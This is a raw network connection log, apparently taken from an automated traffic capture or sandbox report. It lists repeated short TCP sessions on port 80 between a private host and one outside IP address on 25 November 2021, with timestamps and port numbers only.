                                              Nov 25, 2021 10:51:51.089071035 CET5027880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.122435093 CET8050278176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.122725010 CET5027880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.156035900 CET8050278176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.172583103 CET8050278176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.172648907 CET8050278176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.173156977 CET5027880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.173219919 CET5027880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.206578016 CET8050278176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.523200989 CET5027980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.556636095 CET8050279176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.556858063 CET5027980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.558423042 CET5027980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.591773033 CET8050279176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.592035055 CET5027980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.625463009 CET8050279176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.641408920 CET8050279176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.641468048 CET8050279176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:51.641599894 CET5027980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.641660929 CET5027980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:51.675049067 CET8050279176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.023313046 CET5028080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.057414055 CET8050280176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.057622910 CET5028080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.059237957 CET5028080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.093306065 CET8050280176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.093511105 CET5028080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.127660990 CET8050280176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.143548965 CET8050280176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.143613100 CET8050280176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.143805027 CET5028080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.143899918 CET5028080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.178267956 CET8050280176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.492172003 CET5028180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.526258945 CET8050281176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.526575089 CET5028180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.528089046 CET5028180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.562124968 CET8050281176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.562410116 CET5028180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.596424103 CET8050281176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.614006042 CET8050281176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.614056110 CET8050281176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.614222050 CET5028180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.614280939 CET5028180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:52.648266077 CET8050281176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:52.972038984 CET5028280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.006140947 CET8050282176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.006491899 CET5028280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.007932901 CET5028280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.041922092 CET8050282176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.042098999 CET5028280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.076286077 CET8050282176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.092668056 CET8050282176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.092732906 CET8050282176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.093054056 CET5028280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.093151093 CET5028280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.127546072 CET8050282176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.504605055 CET5028380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.538064003 CET8050283176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.538288116 CET5028380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.539836884 CET5028380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.573231936 CET8050283176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.573438883 CET5028380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.606790066 CET8050283176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.622716904 CET8050283176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.622766018 CET8050283176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:53.622945070 CET5028380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.622993946 CET5028380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:53.656562090 CET8050283176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.013423920 CET5028480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.046818972 CET8050284176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.047262907 CET5028480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.048854113 CET5028480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.082194090 CET8050284176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.082403898 CET5028480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.115730047 CET8050284176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.131594896 CET8050284176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.131649971 CET8050284176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.131968021 CET5028480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.132051945 CET5028480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.165713072 CET8050284176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.535517931 CET5028580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.569669008 CET8050285176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.569973946 CET5028580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.571504116 CET5028580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.605545998 CET8050285176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.605751038 CET5028580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.639744997 CET8050285176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.655401945 CET8050285176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.655450106 CET8050285176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:54.655600071 CET5028580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.655647993 CET5028580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:54.689687014 CET8050285176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.039478064 CET5028680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.072850943 CET8050286176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.073071003 CET5028680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.074582100 CET5028680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.107891083 CET8050286176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.108170986 CET5028680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.141345024 CET8050286176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.157455921 CET8050286176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.157556057 CET8050286176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.157773018 CET5028680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.157821894 CET5028680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.190907001 CET8050286176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.471494913 CET5028780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.505414009 CET8050287176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.505726099 CET5028780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.507302046 CET5028780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.541727066 CET8050287176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.541939974 CET5028780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.575923920 CET8050287176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.597352982 CET8050287176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.597400904 CET8050287176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:55.597907066 CET5028780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.597955942 CET5028780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:55.631994009 CET8050287176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.002799988 CET5028880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.036256075 CET8050288176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.036484003 CET5028880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.038111925 CET5028880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.071409941 CET8050288176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.071635962 CET5028880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.105057001 CET8050288176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.120891094 CET8050288176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.120944023 CET8050288176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.121109962 CET5028880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.121160984 CET5028880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.154757977 CET8050288176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.506324053 CET5028980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.540232897 CET8050289176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.540443897 CET5028980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.542011976 CET5028980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.575717926 CET8050289176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.575879097 CET5028980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.609595060 CET8050289176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.625315905 CET8050289176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.625324011 CET8050289176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:56.625534058 CET5028980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.625544071 CET5028980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:56.659296036 CET8050289176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.017134905 CET5029080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.050561905 CET8050290176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.050868034 CET5029080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.052498102 CET5029080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.085856915 CET8050290176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.086070061 CET5029080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.119555950 CET8050290176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.135432959 CET8050290176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.135495901 CET8050290176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.135819912 CET5029080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.135917902 CET5029080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.169574976 CET8050290176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.536479950 CET5029180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.570535898 CET8050291176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.570785999 CET5029180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.572349072 CET5029180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.606357098 CET8050291176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.606625080 CET5029180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.640728951 CET8050291176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.656439066 CET8050291176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.656502962 CET8050291176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:57.656655073 CET5029180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.656719923 CET5029180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:57.691143990 CET8050291176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.045869112 CET5029280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.079920053 CET8050292176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.080185890 CET5029280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.081695080 CET5029280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.115617990 CET8050292176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.115756035 CET5029280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.150388002 CET8050292176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.168097019 CET8050292176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.168170929 CET8050292176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.168406963 CET5029280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.168467045 CET5029280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.202542067 CET8050292176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.568407059 CET5029380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.601890087 CET8050293176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.602199078 CET5029380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.603737116 CET5029380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.637068987 CET8050293176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.637248039 CET5029380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.670521975 CET8050293176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.693893909 CET8050293176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.693938971 CET8050293176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:58.694139957 CET5029380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.694180965 CET5029380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:58.727579117 CET8050293176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.088414907 CET5029480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.122004032 CET8050294176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.122239113 CET5029480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.123734951 CET5029480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.157088995 CET8050294176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.157299995 CET5029480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.190536976 CET8050294176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.211723089 CET8050294176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.211733103 CET8050294176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.212354898 CET5029480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.212364912 CET5029480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.245544910 CET8050294176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.548108101 CET5029580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.581383944 CET8050295176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.581617117 CET5029580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.583120108 CET5029580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.616410017 CET8050295176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.616615057 CET5029580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.649936914 CET8050295176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.666563988 CET8050295176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.666589022 CET8050295176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:51:59.666769981 CET5029580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.666793108 CET5029580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:51:59.700078964 CET8050295176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.048988104 CET5029680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.083168983 CET8050296176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.083420992 CET5029680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.084925890 CET5029680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.118993998 CET8050296176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.119179964 CET5029680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.153348923 CET8050296176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.179145098 CET8050296176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.179217100 CET8050296176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.179378033 CET5029680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.179445982 CET5029680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.213711977 CET8050296176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.583683968 CET5029780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.617110968 CET8050297176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.617405891 CET5029780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.618988991 CET5029780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.652537107 CET8050297176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.652857065 CET5029780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.686554909 CET8050297176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.706468105 CET8050297176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.706536055 CET8050297176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:00.706835032 CET5029780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.706942081 CET5029780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:00.740592957 CET8050297176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.108460903 CET5029880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.141943932 CET8050298176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.142304897 CET5029880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.143884897 CET5029880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.177283049 CET8050298176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.177536964 CET5029880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.210849047 CET8050298176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.226968050 CET8050298176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.227016926 CET8050298176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.227175951 CET5029880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.227242947 CET5029880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.260659933 CET8050298176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.622167110 CET5029980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.656286955 CET8050299176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.656501055 CET5029980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.658061028 CET5029980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.692190886 CET8050299176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.692475080 CET5029980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.726422071 CET8050299176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.742136002 CET8050299176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.742192984 CET8050299176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:01.742377996 CET5029980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.742425919 CET5029980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:01.776572943 CET8050299176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.153024912 CET5030080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.187133074 CET8050300176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.187386990 CET5030080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.188968897 CET5030080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.222987890 CET8050300176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.223208904 CET5030080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.257141113 CET8050300176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.275688887 CET8050300176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.275743961 CET8050300176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.275917053 CET5030080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.275970936 CET5030080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.310241938 CET8050300176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.672337055 CET5030180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.705760002 CET8050301176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.706034899 CET5030180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.707520962 CET5030180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.740863085 CET8050301176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.741075039 CET5030180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.774394035 CET8050301176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.795593977 CET8050301176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.795641899 CET8050301176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:02.795783997 CET5030180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.795831919 CET5030180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:02.829412937 CET8050301176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.190154076 CET5030280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.224181890 CET8050302176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.224427938 CET5030280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.225980043 CET5030280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.259957075 CET8050302176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.260158062 CET5030280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.294318914 CET8050302176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.310566902 CET8050302176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.310617924 CET8050302176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.310791969 CET5030280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.310846090 CET5030280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.344954014 CET8050302176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.700212955 CET5030380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.733678102 CET8050303176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.733942986 CET5030380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.735457897 CET5030380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.768673897 CET8050303176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.768945932 CET5030380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.802241087 CET8050303176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.818984985 CET8050303176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.819035053 CET8050303176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:03.819273949 CET5030380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.819323063 CET5030380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:03.852658987 CET8050303176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.179176092 CET5030480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.212759018 CET8050304176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.213064909 CET5030480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.214606047 CET5030480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.249664068 CET8050304176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.249846935 CET5030480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.283216953 CET8050304176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.306943893 CET8050304176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.306994915 CET8050304176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.307260990 CET5030480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.307312012 CET5030480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.340750933 CET8050304176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.648735046 CET5030580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.682679892 CET8050305176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.683021069 CET5030580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.684537888 CET5030580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.718504906 CET8050305176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.718717098 CET5030580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.752731085 CET8050305176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.768456936 CET8050305176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.768512011 CET8050305176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:04.768659115 CET5030580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.768723011 CET5030580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:04.803047895 CET8050305176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.141415119 CET5030680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.174801111 CET8050306176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.174993038 CET5030680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.176481009 CET5030680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.209907055 CET8050306176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.210149050 CET5030680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.243907928 CET8050306176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.259536028 CET8050306176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.259584904 CET8050306176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.259773970 CET5030680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.259824038 CET5030680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.293406010 CET8050306176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.652057886 CET5030780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.686152935 CET8050307176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.686424971 CET5030780192.168.11.20176.223.209.128
